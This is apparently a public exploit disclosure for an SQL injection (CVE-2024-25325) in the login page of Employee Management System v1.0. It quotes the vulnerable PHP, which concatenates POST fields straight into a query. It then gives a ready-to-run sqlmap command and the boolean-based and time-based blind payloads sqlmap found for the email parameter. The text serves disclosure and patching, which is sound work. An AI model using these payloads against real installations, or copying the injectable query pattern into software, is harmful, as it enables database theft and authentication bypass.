```text # Exploit Title: Employee Management System v.1.0 - SQL Injection # Date: 20 February 2024 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor Homepage: https://www.sourcecodester.com/php/16999/employee-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Walterjnr1/employee_akpoly.zip # Version: v1.0 # CVE: CVE-2024-25325 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- Source Code(Account/Login.php): <?php include('../inc/topbar.php'); if(isset($_POST['btnlogin'])){ //Get Date date_default_timezone_set('Africa/Lagos'); $current_date = date('Y-m-d h:i:s'); $email = $_POST['txtemail']; $password = $_POST['txtpassword']; $status = '1'; $sql = "SELECT * FROM tblemployee WHERE email='" .$email. "' and password = '".$password."' and status = '".$status."'"; $result = mysqli_query($conn, $sql); if (mysqli_num_rows($result) > 0) { // output data of each row ($row = mysqli_fetch_assoc($result)); $_SESSION["login_email"] = $row['email']; header("Location: ../Employee/index.php"); }else { $_SESSION['error']=' Wrong Email Address and Password'; } } ?> -> sqlmap -u "http://localhost/employee_akpoly/Account/login.php" --data="txtemail=newleastpaysolution%40gmail.com&txtpassword=escobar2012&btnlogin=" --batch -dbs --- Parameter: txtemail (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: txtemail=newleastpaysolution@gmail.com' AND 5756=5756 AND 'KYqZ'='KYqZ&txtpassword=escobar2012&btnlogin= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtemail=newleastpaysolution@gmail.com' AND (SELECT 2758 FROM (SELECT(SLEEP(5)))vkrP) AND 'oTgK'='oTgK&txtpassword=escobar2012&btnlogin= --- ```